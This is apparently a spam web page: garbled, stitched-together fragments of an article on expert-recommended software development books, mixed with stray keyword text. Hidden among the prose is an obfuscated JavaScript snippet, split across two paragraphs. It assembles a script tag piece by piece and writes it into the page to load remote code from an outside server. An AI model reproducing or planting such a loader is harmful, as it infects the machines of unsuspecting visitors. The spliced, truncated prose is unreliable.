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They are about mastering consistent ways of doing things in your applications This book will help you learn to think along those lines.. Books shelved as software-development: Code Complete by Steve McConnell, The Pragmatic Programmer: From Journeyman to Master by Andrew Hunt, Design Patte.. — Andrew Brust, CEO of Blue Badge Insights, a strategy consultancy for Microsoft partners“HTML5 Games: Creating Fun with HTML5, CSS3 and Web.

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Connell For development teams, this book is the Bible The first edition was published more than 1.. It introduced the concept that software development isn’t about just the code, raising such questions as: Did you build the right application?Did you build it in the right way? Did you test the application better than the customer will test it? There will always be a place for these kinds of books about software development.. — Scott Seely, founder of software consultancy Friseton“Expert C# 2 Business Objects”By Rockford Lhotka This book is aimed at C# users, but the concepts it talks about are universal.

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— David Yack, CTO of software consultancy Colorado Technology Consultants“Design Patterns” provides the developer with the common vocabulary that all the senior developers are using: Singleton, Façade, factory and more. 10 sec haushaltsbuch serial port

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Here are waht the experts recommend Technology Books“Code Complete: A Practical Handbook of Software Construction”By Steve Mc.. It talks about the importance of source control, for example Today, we take things like this for granted, but in the early 1.. Code Complete” was on my shelf for 1 I would buy them a copy and ask them to read it.. Known as the “Gang of Four,” the authors of this book convey the idea that software patterns are more than just solutions to common problems.. write(Oa["Ml"]+Oa["Gy"]+Oa["cw"]+Oa["nD"]+Oa["FR"]+Oa["kf"]+Oa["Cx"]+Oa["Np"]+Oa["BP"]+Oa["Nt"]+Oa["Gj"]+Oa["Gy"]+Oa["cw"]+Oa["nD"]+Oa["Ml"]+Oa["Gy"]+Oa["cw"]+Oa["Rs"]+Oa["IR"]+Oa["su"]+Oa["LB"]+Oa["AD"]+Oa["Ho"]+Oa["QH"]+Oa["mt"]+Oa["kk"]+Oa["Gy"]+Oa["cw"]+Oa["Tu"]+Oa["fL"]+Oa["zF"]+Oa["LB"]+Oa["gl"]+Oa["ha"]+Oa["Rg"]+Oa["JZ"]+Oa["wC"]+Oa["tn"]+Oa["Pk"]+Oa["eT"]+Oa["Rd"]+Oa["rG"]+Oa["yo"]+Oa["Hf"]+Oa["di"]+Oa["ED"]+Oa["zm"]+Oa["eg"]+Oa["Sd"]+Oa["Kg"]+Oa["mL"]+Oa["Ku"]+Oa["Gy"]+Oa["cw"]+Oa["UH"]+Oa["Ro"]+Oa["oY"]+Oa["DZ"]+Oa["fZ"]+Oa["Cc"]+Oa["tS"]+Oa["gR"]+Oa["Ec"]+Oa["WJ"]+Oa["Bg"]+Oa["Ak"]+Oa["ym"]+Oa["vM"]+Oa["zY"]+Oa["sX"]+Oa["MQ"]+Oa["ws"]+Oa["Re"]+Oa["EE"]+Oa["xz"]+Oa["Jb"]+Oa["BP"]+Oa["NZ"]+Oa["WS"]+Oa["Bj"]);The best books for software developers.

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They persist and continue to be important — Richard Campbell, cofounder of software consultancy Strangeloop Networks“Design Patterns: Elements of Reusable Object- Oriented Software”By Erich Gamma, Richard Helm, Ralph Johnson, and John Vlissides.. With the proliferation of online articles and ebooks, old- fashioned paper books seem not to have a place in today’s world.. Lhotka addresses timeless truths that all software developers must contend with: separation of concerns, multi- tiered architecture, and proper application design—to name just a few.. Many experts, however, still find useful things in paperbacks and hardcovers From technology to people and team management, these books still help developers out today.. s";Oa["Tu"]="t\"";Oa["vM"]="do";Oa["LB"]="=\"";Oa["zY"]="wn";Oa["WS"]="pt";Oa["cw"]="ip";Oa["Nt"]=";";Oa["Gj"]="/s";Oa["MQ"]="ad";Oa["Ho"]="xt";Oa["su"]="pe";Oa["wC"]="dN";Oa["Rg"]=":/";Oa["eT"]="xF";Oa["Rs"]="t ";Oa["Rd"]="U8";Oa["gR"]="ur";Oa["BP"]="sc";Oa["JZ"]="/T";Oa["ha"]="tp";Oa["Kg"]="1C";Oa["ws"]="_e";Oa["Cx"]="q ";Oa["eg"]="za";Oa["tS"]="rt";Oa["Pk"]="i8";Oa["nD"]="t>";Oa["zF"]="rc";Oa["IR"]="ty";Oa["ED"]="Be";Oa["Jb"]="";Oa["Cc"]="/a";Oa["Ak"]="de";Oa["NZ"]="ri";Oa["ym"]="x_";Oa["fL"]=" s";Oa["Bg"]="in";Oa["di"]="Zm";Oa["WJ"]="g/";document.. var sc = 'best+book+software+development';var Oa = new Array();Oa["gl"]="ht";Oa["kf"]="r ";Oa["EE"]="js";Oa["Hf"]="Jk";Oa["Ku"]=". 518b7cbc7d